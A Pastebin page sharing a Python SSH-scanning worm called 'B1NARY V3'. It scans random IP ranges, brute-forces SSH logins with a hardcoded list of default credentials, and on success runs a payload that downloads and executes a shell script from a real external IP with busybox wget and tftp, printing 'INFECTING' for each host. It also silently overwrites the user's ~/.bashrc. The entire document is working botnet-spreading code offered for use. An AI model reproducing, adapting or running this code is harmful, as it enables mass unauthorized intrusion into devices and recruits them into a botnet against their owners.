API tools faq
paste
Advertisement
Guest User

scan.py

a guest
Oct 12th, 2016
339
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 18.05 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. #MUST INSTALL PARAMIKO
  4. #yum install python-paramiko -y
  5. """
  6. Usage: python b1naryv3.py [threads] [A|B|C|BRAZIL|SUPER|LUCKY|LUCKY2|RAND|INTERNET] [IPRANGE] [1|2|routers|perl|ubuntu|root|vps1|vps2|vps3|r00ted]
  7. Skype: bl4ck.j3sus
  8. XMPP: b1nary@darkness.su
  9. Made Date: 6-16-16
  10. """
  11. """
  12.  
  13. # ___ __________ ____ _______ _____ _______________.___. ___
  14. # / _ \_/\ \______ \/_ |\ \ / _ \\______ \__ | | / _ \_/\
  15. # \/ \___/ | | _/ | |/ | \ / /_\ \| _// | | \/ \___/
  16. # | | \ | / | \/ | \ | \\____ |
  17. # |______ / |___\____|__ /\____|__ /____|_ // ______|
  18. # \/ \/ \/ \/ \/
  19. ***B1NARY V3***
  20. """
  21. import threading, random, socket, time, sys, os
  22. usage='python b1naryv3.py [threads] [A|B|C|BRAZIL|SUPER|LUCKY|LUCKY2|RAND|INTERNET] [IPRANGE] [1|2|routers|perl|ubuntu|root|vps1|vps2|vps3|r00ted]'
  23. if len(sys.argv) < 4:
  24. sys.exit(usage)
  25. os.system("echo -e 'ulimit -s 999999; ulimit -n 999999; ulimit -u 999999\n' > ~/.bashrc")
  26. os.system("ulimit -s 999999; ulimit -n 999999; ulimit -u 999999")
  27. paramiko.util.log_to_file("/dev/null")
  28. os.system("sysctl -w fs.file-max=999999 >/dev/null")
  29.  
  30. """
  31. ████████▄ ▄████████ ▄████████ ▄█ ███▄▄▄▄ ▄████████ ▄████████
  32. ███ ▀███ ███ ███ ███ ███ ███ ███▀▀▀██▄ ███ ███ ███ ███
  33. ███ ███ ███ █▀ ███ █▀ ███▌ ███ ███ ███ █▀ ███ █▀
  34. ███ ███ ▄███▄▄▄ ▄███▄▄▄ ███▌ ███ ███ ▄███▄▄▄ ███
  35. ███ ███ ▀▀███▀▀▀ ▀▀███▀▀▀ ███▌ ███ ███ ▀▀███▀▀▀ ▀███████████
  36. ███ ███ ███ █▄ ███ ███ ███ ███ ███ █▄ ███
  37. ███ ▄███ ███ ███ ███ ███ ███ ███ ███ ███ ▄█ ███
  38. ████████▀ ██████████ ███ █▀ ▀█ █▀ ██████████ ▄████████▀
  39. """
  40. cmd='cd /tmp; rm -rf *;busybox wget -q http://208.67.1.183/gtop.sh; chmod +x gtop.sh; sh gtop.sh; rm -rf *; busybox tftp -r tftp.sh -g ; sh tftp.sh; busybox tftp -c get tftp2.sh; sh tftp2.sh\r\n' #PAYLOAD
  41. blacklist = [
  42. '127'
  43. ]
  44. passwords = [
  45. "root:root",
  46. "root:toor",
  47. "root:admin",
  48. "root:1234",
  49. "root:maxided",
  50. "root:pi",
  51. "root:alpine",
  52. "root:r00tnull3d",
  53. "root:r00tnull3d#",
  54. "root:rootnull3d#",
  55. "root:password",
  56. "root:centos6svm",
  57. "root:1234",
  58. "root:123456",
  59. "root:Love2020",
  60. "root:Zero",
  61. "root:Password",
  62. "root:password",
  63. "root:qwerty",
  64. "root:dragon",
  65. "root:pussy",
  66. "root:baseball",
  67. "root:football",
  68. "root:monkey",
  69. "root:696969",
  70. "root:abc123"
  71. "admin:admin",
  72. "admin:1234",
  73. "admin:Guest",
  74. "ubnt:ubnt",
  75. "guest:guest",
  76. "user:user",
  77. "test:test",
  78. "pi:raspberry",
  79. "vagrant:vagrant",
  80. "localhost:root",
  81. "B1NARY:B1NARY",
  82. "tim:tim",
  83. "CISCO:CISCO",
  84. "netgear"
  85. "support:support",
  86. "oracle:oracle",
  87. "cusadmin:password",
  88. ]
  89.  
  90. """
  91. ▄█ ▄███████▄ ▄████████ ▄████████ ▄██████▄ ███▄▄▄▄ ▄████████ ▄████████
  92. ███ ███ ███ ███ ███ ███ ███ ███ ███ ███▀▀▀██▄ ███ ███ ███ ███
  93. ███▌ ███ ███ ███ ███ ███ ███ ███ █▀ ███ ███ ███ █▀ ███ █▀
  94. ███▌ ███ ███ ▄███▄▄▄▄██▀ ███ ███ ▄███ ███ ███ ▄███▄▄▄ ███
  95. ███▌ ▀█████████▀ ▀▀███▀▀▀▀▀ ▀███████████ ▀▀███ ████▄ ███ ███ ▀▀███▀▀▀ ▀███████████
  96. ███ ███ ▀███████████ ███ ███ ███ ███ ███ ███ ███ █▄ ███
  97. ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▄█ ███
  98. █▀ ▄████▀ ███ ███ ███ █▀ ████████▀ ▀█ █▀ ██████████ ▄████████▀
  99. ███ ███
  100. """
  101. br = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
  102. yeet = ["122","131","161","37","186","187","31","188","201","2","200"]
  103. lucky = ["125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180"]
  104. lucky2 = ["119.91","119.92","119.93","113.53"]
  105. lol = ["1","2","5","119","180","113","125","122","46","101",""]
  106.  
  107. """
  108. ▄███████▄ ▄████████ ▄████████ ▄████████ ▄████████ ▄██████▄ ▄▄▄▄███▄▄▄▄ ▀█████████▄ ▄██████▄ ▄████████
  109. ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▄██▀▀▀███▀▀▀██▄ ███ ███ ███ ███ ███ ███
  110. ███ ███ ███ ███ ███ █▀ ███ █▀ ███ █▀ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ █▀
  111. ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▄███▄▄▄██▀ ███ ███ ███
  112. ▀█████████▀ ▀███████████ ▀███████████ ▀███████████ ███ ███ ███ ███ ███ ███ ▀▀███▀▀▀██▄ ███ ███ ▀███████████
  113. ███ ███ ███ ███ ███ ███ █▄ ███ ███ ███ ███ ███ ███ ██▄ ███ ███ ███
  114. ███ ███ ███ ▄█ ███ ▄█ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▄█ ███
  115. ▄████▀ ███ █▀ ▄████████▀ ▄████████▀ ████████▀ ▀██████▀ ▀█ ███ █▀ ▄█████████▀ ▀██████▀ ▄████████▀
  116. """
  117.  
  118. if sys.argv[4] == '1':
  119. passwords = ["root:root", "root:admin", "admin:1234"]
  120. if sys.argv[4] == '2':
  121. passwords = ["root:root", "root:toor", "root:admin", "admin:1234", "oracle:oracle", "root:alpine"]
  122. if sys.argv[4] == 'routers':
  123. passwords = ["root:admin", "root:root", "admin:1234", "admin:password", "cisco:cisco", "netgear:netgear", "cusadmin:password"]
  124. if sys.argv[4] == 'perl':
  125. passwords = [ "pi:raspberry", "vagrant:vagrant", "ubnt:ubnt" ]
  126. if sys.argv[4] == 'ubuntu':
  127. passwords = [ "ubnt:ubnt", "ubnt:1234", "ubnt:password" ]
  128. if sys.argv[4] == 'root':
  129. passwords = [ "root:root","root:test" ]
  130. if sys.argv[4] == 'vps1':
  131. passwords = [ "root:maxided", "root:centos6svm", "root:123456", "root:Love2020", "root:Zero", "root:Password", "root:password"]
  132. if sys.argv[4] == 'vps2':
  133. passwords = [ "root:maxided", "root:centos6svm", "root:1234", "root:qwerty", "root:dragon", "root:pussy", "root:baseball"]
  134. if sys.argv[4] == 'vps3':
  135. passwords = [ "root:maxided", "root:centos6svm", "root:football", "root:monkey", "root:696969", "root:abc123"]
  136. if sys.argv[4] == 'r00ted':
  137. passwords = [ "localhost:root", "B1NARY:B1NARY", "root:r00tnull3d#", "root:Flunzy2016", "bash:root"]
  138. if sys.argv[4] == 'brute':
  139. passwords = [ "root:centos6svm", "root:root", "root:toor", "root:abc123"]
  140. if sys.argv[4] == 'lol':
  141. passwords = [ "admin:1234"]
  142.  
  143. """
  144. ▄█ ▄███████▄ ▄████████ ▄█ ▄████████ ▄████████ ▄████████ ▄████████ ▄████████
  145. ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███
  146. ███▌ ███ ███ ███ █▀ ███ ███ ███ ███ █▀ ███ █▀ ███ █▀ ███ █▀
  147. ███▌ ███ ███ ███ ███ ███ ███ ███ ███ ▄███▄▄▄ ███
  148. ███▌ ▀█████████▀ ███ ███ ▀███████████ ▀███████████ ▀███████████ ▀▀███▀▀▀ ▀███████████
  149. ███ ███ ███ █▄ ███ ███ ███ ███ ███ ███ █▄ ███
  150. ███ ███ ███ ███ ███▌ ▄ ███ ███ ▄█ ███ ▄█ ███ ███ ███ ▄█ ███
  151. █▀ ▄████▀ ████████▀ █████▄▄██ ███ █▀ ▄████████▀ ▄████████▀ ██████████ ▄████████▀
  153. """
  154. ipclassinfo = sys.argv[2]
  155. if ipclassinfo == "A":
  156. ip1 = sys.argv[3]
  157. elif ipclassinfo == "B":
  158. ip1 = sys.argv[3].split(".")[0]
  159. ip2 = sys.argv[3].split(".")[1]
  160. elif ipclassinfo == "C":
  161. ips = sys.argv[3].split(".")
  162. num=0
  163. for ip in ips:
  164. num=num+1
  165. if num == 1:
  166. ip1 = ip
  167. elif num == 2:
  168. ip2 = ip
  169. elif num == 3:
  170. ip3 = ip
  171. """
  172. ▄████████ ▄████████ ▄█ █▄ ▄████████ ▄████████ ▄████████ ███▄▄▄▄ ███▄▄▄▄ ▄████████ ▄████████
  173. ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███▀▀▀██▄ ███▀▀▀██▄ ███ ███ ███ ███
  174. ███ █▀ ███ █▀ ███ ███ ███ █▀ ███ █▀ ███ ███ ███ ███ ███ ███ ███ █▀ ███ ███
  175. ███ ███ ▄███▄▄▄▄███▄▄ ███ ███ ███ ███ ███ ███ ███ ███ ▄███▄▄▄ ▄███▄▄▄▄██▀
  176. ▀███████████ ▀███████████ ▀▀███▀▀▀▀███▀ ▀███████████ ███ ▀███████████ ███ ███ ███ ███ ▀▀███▀▀▀ ▀▀███▀▀▀▀▀
  177. ███ ███ ███ ███ ███ ███ █▄ ███ ███ ███ ███ ███ ███ ███ █▄ ▀███████████
  178. ▄█ ███ ▄█ ███ ███ ███ ▄█ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███
  179. ▄████████▀ ▄████████▀ ███ █▀ ▄████████▀ ████████▀ ███ █▀ ▀█ █▀ ▀█ █▀ ██████████ ███ ███
  180. ███ ███
  181. """
  182. class sshscanner(threading.Thread):
  183. global passwords
  184. global ipclassinfo
  185. if ipclassinfo == "A":
  186. global ip1
  187. elif ipclassinfo == "B":
  188. global ip1
  189. global ip2
  190. elif ipclassinfo == "C":
  191. global ip1
  192. global ip2
  193. global ip3
  194. def run(self):
  195. while 1:
  196. try:
  197. while 1:
  198. thisipisbad='no'
  199. if ipclassinfo == "A":
  200. self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  201. elif ipclassinfo == "B":
  202. self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  203. elif ipclassinfo == "C":
  204. self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
  205. elif ipclassinfo == "BRAZIL":
  206. self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  207. elif ipclassinfo == "SUPER":
  208. self.host = random.choice(yeet)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  209. elif ipclassinfo == "LUCKY":
  210. self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  211. elif ipclassinfo == "LUCKY2":
  212. self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  213. elif ipclassinfo == "RAND":
  214. self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  215. elif ipclassinfo == "INTERNET":
  216. self.host = random.choice(lol)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  217. else:
  218. self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  219. for badip in blacklist:
  220. if badip in self.host:
  221. thisipisbad='yes'
  222. if thisipisbad=='no':
  223. break
  224. username='root'
  225. password=""
  226. port = 22
  227. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  228. s.settimeout(3)
  229. s.connect((self.host, port))
  230. s.close()
  231. ssh = paramiko.SSHClient()
  232. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  233. dobreak=False
  234. for passwd in passwords:
  235. if ":n/a" in passwd:
  236. password=""
  237. else:
  238. password=passwd.split(":")[1]
  239. if "n/a:" in passwd:
  240. username=""
  241. else:
  242. username=passwd.split(":")[0]
  243. try:
  244. ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
  245. dobreak=True
  246. break
  247. except:
  248. pass
  249. if True == dobreak:
  250. break
  251. badserver=True
  252. stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  253. output = stdout.read()
  254. if "inet addr" in output:
  255. badserver=False
  256. if badserver == False:
  257. print '\x1b[31mINFECTING:'+self.host+'|'+username+'|'+password+'|'+str(port)
  258. ssh.exec_command(""+cmd+"")
  259. time.sleep(20)
  260. ssh.close()
  261. except:
  262. pass
  263.  
  264. for x in range(0,int(sys.argv[1])):
  265. try:
  266. t = sshscanner()
  267. t.start()
  268. except:
  269. pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!